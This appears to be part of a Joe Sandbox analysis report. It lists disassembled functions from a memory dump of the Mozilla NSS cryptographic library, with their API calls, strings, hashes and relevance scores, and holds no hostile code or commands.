API String ID: 3756394533-2552752316
Opcode ID: f177ec899e00ec3cd0ebfb13c9a4d36720d19c5b54a216b12720f9ba52708a46
Instruction ID: 53e1dde75d0529bd00ca2d3e86901273953251d1d846f56983d7e746eb38187d
Opcode Fuzzy Hash: f177ec899e00ec3cd0ebfb13c9a4d36720d19c5b54a216b12720f9ba52708a46
Instruction Fuzzy Hash: 3A41ADF1900141ABDB215F54DE49ABA3665AF8230CF5A4134E80A1BB02E731F925D7D3

Function 6C7B6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C7B6943
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C7B6957
Part of subcall function 6C7B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C7B6972
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C7B6983
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7B69AA
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7B69BE
Part of subcall function 6C7B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7B69D2
Part of subcall function 6C7B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7B69DF
Part of subcall function 6C7B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C7B6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7B6D8C
free.MOZGLUE(00000000), ref: 6C7B6DC5
free.MOZGLUE(?), ref: 6C7B6DD6
free.MOZGLUE(?), ref: 6C7B6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C7B6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6E72
free.MOZGLUE(?), ref: 6C7B6EA7
free.MOZGLUE(?), ref: 6C7B6EC4
free.MOZGLUE(?), ref: 6C7B6ED5
free.MOZGLUE(00000000), ref: 6C7B6EE3
free.MOZGLUE(?), ref: 6C7B6EF4
free.MOZGLUE(?), ref: 6C7B6F08
free.MOZGLUE(00000000), ref: 6C7B6F35
free.MOZGLUE(?), ref: 6C7B6F44
free.MOZGLUE(?), ref: 6C7B6F5B
free.MOZGLUE(00000000), ref: 6C7B6F65

Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C7B781D,00000000,6C7ABE2C,?,6C7B6B1D,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C40
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C7B781D,?,6C7ABE2C,?), ref: 6C7B6C58
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C7B781D), ref: 6C7B6C6F
Part of subcall function 6C7B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C7B6C84
Part of subcall function 6C7B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C7B6C96
Part of subcall function 6C7B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C7B6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C7B6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C7B6FF4

Strings

+`|l, xrefs: 6C7B6D0D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`|l
API String ID: 1304971872-3643680650
Opcode ID: 682faba1504c722236518796e5e00aea7659d53f37002e8fa7edcaf600f460ca
Instruction ID: cf43ed0f09616af22ec8ad4a7062b25fe27b940a566252fb9b7644d2369c2542
Opcode Fuzzy Hash: 682faba1504c722236518796e5e00aea7659d53f37002e8fa7edcaf600f460ca
Instruction Fuzzy Hash: A1B14CB1E012099FDF14DFA9DA45B9EBBB8BF05248F140034EA15F7A41E731EA15CBA1

Function 6C7AE640 Relevance: 34.8, APIs: 23, Instructions: 266memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,6C7B8C5B,-00000001), ref: 6C7AE655

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PK11_GetIVLength.NSS3(-00000001,?,?,6C7B8C5B,-00000001), ref: 6C7AE7DE
PORT_Alloc_Util.NSS3(00000000,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE7F4
PK11_GenerateRandom.NSS3(00000000,00000000,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE807
PK11_GetIVLength.NSS3(-00000001,?,?,6C7B8C5B,-00000001), ref: 6C7AE81B
PORT_Alloc_Util.NSS3(00000000,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE82E
PK11_GenerateRandom.NSS3(00000000,00000000,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE841
free.MOZGLUE(00000000,?,?,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE852
PORT_Alloc_Util.NSS3(00000004,?,?,6C7B8C5B,-00000001), ref: 6C7AE878
free.MOZGLUE(00000000,?,?,6C7B8C5B,-00000001), ref: 6C7AE8AB
PORT_Alloc_Util.NSS3(0000000C,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE8B6
PORT_Alloc_Util.NSS3(00000008,?,?,?,?,6C7B8C5B,-00000001), ref: 6C7AE8D4
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7AE9D5

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Alloc_$K11_$GenerateLengthRandomfree$Item_ValueZfreemalloc
String ID:
API String ID: 1964932494-0
Opcode ID: 073349e5733edba0e6c68ee991c4857cb48f3dafc86de964623400caf0811685
Instruction ID: 0be80cafdc46dd08f612ec94fb7168419a17805ec8586abbbc1e4ee95b084084
Opcode Fuzzy Hash: 073349e5733edba0e6c68ee991c4857cb48f3dafc86de964623400caf0811685
Instruction Fuzzy Hash: 0981E7B0902B094BFB508BA99EC976F39E89B0034CF204236D95986E50F735D966C7D7

Function 6C7B2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C7B2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C7B2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C7B2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C,?,-00000001,00000000,?), ref: 6C7B2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C,?,-00000001,00000000), ref: 6C7B2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C7B2EF8
PR_Unlock.NSS3(?), ref: 6C7B2F62
TlsGetValue.KERNEL32 ref: 6C7B2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B2F9E
PR_Unlock.NSS3(?), ref: 6C7B2FCA
TlsGetValue.KERNEL32 ref: 6C7B301A
EnterCriticalSection.KERNEL32(?), ref: 6C7B302E
PR_Unlock.NSS3(?), ref: 6C7B3066
PR_SetError.NSS3(00000000,00000000), ref: 6C7B3085
PR_Unlock.NSS3(?), ref: 6C7B30EC
TlsGetValue.KERNEL32 ref: 6C7B310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B3124
PR_Unlock.NSS3(?), ref: 6C7B314C

Part of subcall function 6C799180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C7C379E,?,6C799568,00000000,?,6C7C379E,?,00000001,?), ref: 6C79918D
Part of subcall function 6C799180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C7C379E,?,6C799568,00000000,?,6C7C379E,?,00000001,?), ref: 6C7991A0

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

PR_SetError.NSS3(00000000,00000000), ref: 6C7B316D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 8104c93c1cf2ba66d2af22fd7740f98f4d354cb5b0ae21e273bd5d6050997c1b
Instruction ID: b591ae05f0b4577022efdb5a90a887cdc141243c1516ac9588765464985c27bb
Opcode Fuzzy Hash: 8104c93c1cf2ba66d2af22fd7740f98f4d354cb5b0ae21e273bd5d6050997c1b
Instruction Fuzzy Hash: EDF1AEB5D00609AFDF11DF68D988B99BBB8BF09318F144179EC04A7B11EB31E995CB81

Function 6C7AAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C7AAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C7AAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C7AAF83

Part of subcall function 6C88D930: PL_strncpyz.NSS3(?,?,?), ref: 6C88D963

PR_LogPrint.NSS3(?,00000000), ref: 6C7AAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C7AAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C7AAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C7AAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C7AB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C7AB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C7AB041

Strings

pParameter = 0x%p, xrefs: 6C7AAFB9
(CK_INVALID_HANDLE), xrefs: 6C7AAF7C
ulParameterLen = 0x%p, xrefs: 6C7AAFD4
hSession = 0x%x, xrefs: 6C7AAF5E, 6C7AAF6E
ulDataLen = %d, xrefs: 6C7AB00A
pData = 0x%p, xrefs: 6C7AAFEF
pSignature = 0x%p, xrefs: 6C7AB023
C_SignMessage, xrefs: 6C7AAF41
pulSignatureLen = 0x%p, xrefs: 6C7AB03C

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 1ca4dced24910019585517135164bf94380cf118aae457a89665ec257ac73513
Instruction ID: 34a1641d400dae5ce9b8c2da7217bf5c3d490182b51da7b3857cd1c6f5171dc5
Opcode Fuzzy Hash: 1ca4dced24910019585517135164bf94380cf118aae457a89665ec257ac73513
Instruction Fuzzy Hash: BB41D235602058AFDB308F98DF4CE9A7BB1AB4631DF088475E80867B12D734B819DBE1

Function 6C7A2700 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 114COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotInfo), ref: 6C7A271C
PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C7A274E

Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880B88
Part of subcall function 6C8809D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C880C5D
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C880C8D
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880C9C
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(?), ref: 6C880CD1
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C880CEC
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880CFB
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880D16
Part of subcall function 6C8809D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C880D26
Part of subcall function 6C8809D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C880D35
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C880D65
Part of subcall function 6C8809D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C880D70
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880D90
Part of subcall function 6C8809D0: free.MOZGLUE(00000000), ref: 6C880D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C7A2735

Part of subcall function 6C8809D0: PR_Now.NSS3 ref: 6C880A22
Part of subcall function 6C8809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C880A35
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C880A66
Part of subcall function 6C8809D0: PR_GetCurrentThread.NSS3 ref: 6C880A70
Part of subcall function 6C8809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C880A9D
Part of subcall function 6C8809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C880AC8
Part of subcall function 6C8809D0: PR_vsmprintf.NSS3(?,?), ref: 6C880AE8
Part of subcall function 6C8809D0: EnterCriticalSection.KERNEL32(?), ref: 6C880B19
Part of subcall function 6C8809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C880B48
Part of subcall function 6C8809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C880C76
Part of subcall function 6C8809D0: PR_LogFlush.NSS3 ref: 6C880C7E

PR_LogPrint.NSS3( slotDescription = "%.64s",?), ref: 6C7A27C2
PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C7A27E2
PR_LogPrint.NSS3( flags = %s %s %s,CKF_HW_SLOT,CKF_REMOVABLE_DEVICE,CKF_TOKEN_PRESENT), ref: 6C7A2823
PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C7A2845
PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C7A2867

Strings

slotID = 0x%x, xrefs: 6C7A2730
CKF_TOKEN_PRESENT, xrefs: 6C7A27FF, 6C7A281B
CKF_HW_SLOT, xrefs: 6C7A2813, 6C7A281D
C_GetSlotInfo, xrefs: 6C7A2717
CKF_REMOVABLE_DEVICE, xrefs: 6C7A2809, 6C7A281C
hardware version: %d.%d, xrefs: 6C7A2840
manufacturerID = "%.32s", xrefs: 6C7A27DD
slotDescription = "%.64s", xrefs: 6C7A27BD
pInfo = 0x%p, xrefs: 6C7A2749
flags = %s %s %s, xrefs: 6C7A281E
firmware version: %d.%d, xrefs: 6C7A2862

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: firmware version: %d.%d$ flags = %s %s %s$ hardware version: %d.%d$ manufacturerID = "%.32s"$ pInfo = 0x%p$ slotDescription = "%.64s"$ slotID = 0x%x$CKF_HW_SLOT$CKF_REMOVABLE_DEVICE$CKF_TOKEN_PRESENT$C_GetSlotInfo
API String ID: 2278790770-1459004011
Opcode ID: 29df66b565bdfe7b66cacdbd0ffd725250487f9da7934f30bdd453726f7699a1
Instruction ID: 96fdf6ffeecd04cb8bd735b7a68e7b1acf684e6a03e7a02e3ef64329aeafefff
Opcode Fuzzy Hash: 29df66b565bdfe7b66cacdbd0ffd725250487f9da7934f30bdd453726f7699a1
Instruction Fuzzy Hash: B841F6B0602150AFEB349B969F8CA6577A5EB8221DF448975FD0997B03D730FC09CB92

Function 6C7B25D0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C78662E,?,?), ref: 6C7B264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C78662E,?,?), ref: 6C7B2670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C78662E,?), ref: 6C7B2684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7B26C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C7B26E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C7B26F4
PR_Unlock.NSS3(?), ref: 6C7B274D
PR_SetError.NSS3(00000000,00000000), ref: 6C7B28A9

Part of subcall function 6C7C3440: PK11_GetAllTokens.NSS3 ref: 6C7C3481
Part of subcall function 6C7C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C7C34A3
Part of subcall function 6C7C3440: TlsGetValue.KERNEL32 ref: 6C7C352E
Part of subcall function 6C7C3440: EnterCriticalSection.KERNEL32(?), ref: 6C7C3542
Part of subcall function 6C7C3440: PR_Unlock.NSS3(?), ref: 6C7C355B

PR_Unlock.NSS3(?), ref: 6C7B27A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C78662E,?,?,?), ref: 6C7B27B5
PR_Unlock.NSS3(?), ref: 6C7B27CE
TlsGetValue.KERNEL32 ref: 6C7B27E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B2800

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

PR_Unlock.NSS3(?), ref: 6C7B2834
TlsGetValue.KERNEL32 ref: 6C7B284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6C7B2866

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

.fxl, xrefs: 6C7B2618, 6C7B2632
.fxl, xrefs: 6C7B261B, 6C7B269B, 6C7B26CA, 6C7B2780, 6C7B2890, 6C7B2635, 6C7B269E, 6C7B2738, 6C7B2783

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID: .fxl$.fxl
API String ID: 544520609-2166066456
Opcode ID: 79803fa92c74624860fd4222e10b32f29ec54089aefa022796f336d27704b33b
Instruction ID: 35ebf18c0a46d56c962c865c4bb0dcae21a7cbcedd84ea8c72734eb8d8c99170
Opcode Fuzzy Hash: 79803fa92c74624860fd4222e10b32f29ec54089aefa022796f336d27704b33b
Instruction Fuzzy Hash: 47B1C0B4E012059FDB10DF69DA88BAAB7B4FF09308F104539E905A7B12E731E944CBA1

Function 6C7D0550 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 182stringCOMMON

Download Yara Rule

APIs

PR_GetEnvSecure.NSS3(NSS_ALLOW_WEAK_SIGNATURE_ALG,00000002,00000000,?,6C7B5989), ref: 6C7D0571

Part of subcall function 6C761240: TlsGetValue.KERNEL32(00000040,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761267
Part of subcall function 6C761240: EnterCriticalSection.KERNEL32(?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C76127C
Part of subcall function 6C761240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C761291
Part of subcall function 6C761240: PR_Unlock.NSS3(?,?,?,?,6C76116C,NSPR_LOG_MODULES), ref: 6C7612A0

PR_GetEnvSecure.NSS3(NSS_HASH_ALG_SUPPORT,?,00000002,00000000,?,6C7B5989), ref: 6C7D05B7
PORT_Strdup_Util.NSS3(00000000,?,?,00000002,00000000,?,6C7B5989), ref: 6C7D05C8
strchr.VCRUNTIME140(00000000,0000003B,?,?,?,00000002,00000000,?,6C7B5989), ref: 6C7D05EC
strstr.VCRUNTIME140(00000001,?), ref: 6C7D0653
free.MOZGLUE(?,?,?,?,00000002,00000000,?,6C7B5989), ref: 6C7D0681
PORT_NewArena_Util.NSS3(00000800,?,?,?,?,00000002,00000000,?,6C7B5989), ref: 6C7D06AB
PL_NewHashTable.NSS3(00000000,6C7CFE80,?,6C81C350,00000000,00000000,?,?,?,?,?,00000002,00000000,?,6C7B5989), ref: 6C7D06D5
PL_NewHashTable.NSS3(00000000,?,6C81C350,6C81C350,00000000,00000000), ref: 6C7D06EC
PL_HashTableAdd.NSS3(?,6C89E618,6C89E618), ref: 6C7D070F

Part of subcall function 6C6F2DF0: PL_HashTableRawAdd.NSS3(?,?,?,?,?), ref: 6C6F2E35

PL_HashTableAdd.NSS3(FFFFFFFF,6C89E618), ref: 6C7D0738
PL_HashTableAdd.NSS3(6C89E634,6C89E634), ref: 6C7D0752
